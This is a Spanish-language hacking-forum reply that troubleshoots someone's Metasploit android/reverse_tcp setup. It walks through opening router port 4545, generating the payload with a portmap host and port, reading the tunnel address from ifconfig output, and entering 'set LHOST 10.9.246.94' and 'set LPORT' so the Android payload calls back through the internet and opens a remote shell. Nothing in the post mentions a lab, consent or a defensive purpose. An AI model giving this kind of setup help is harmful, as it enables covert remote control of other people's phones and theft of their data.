elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking / Re: android/reverse_tcp metasploit (AYUDA!) en: 17 Mayo 2022, 02:13 am
Hola.
1. Asegúrate de tener el puerto 4545 abierto en tu Router.
2. El payload se genera con el host y port de portmap.
3. Al momento de configurar el exploit en la consola de metasploit, la ip y puerto que tienes que poner la puedes encontrar en tun0 al momento de ejecutar el comando de ifconfig:
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.253.132  netmask 255.255.255.0  broadcast 192.168.253.255
        inet6 fe80::20c:29ff:fe1b:57dd  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:1b:57:dd  txqueuelen 1000  (Ethernet)
        RX packets 157  bytes 37641 (36.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 52  bytes 7753 (7.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.9.246.94  netmask 255.255.255.255  destination 10.9.246.93
        inet6 fe80::f44a:ca6d:f9c6:4751  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 50

Tendras que usar los datos de tun0. En este caso quedaria
set LHOST 10.9.246.94
set LPORT (puerto que tienes abierto en el router, en tu caso 4545)
Si esta todo correcto debería funcionar todo bien.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines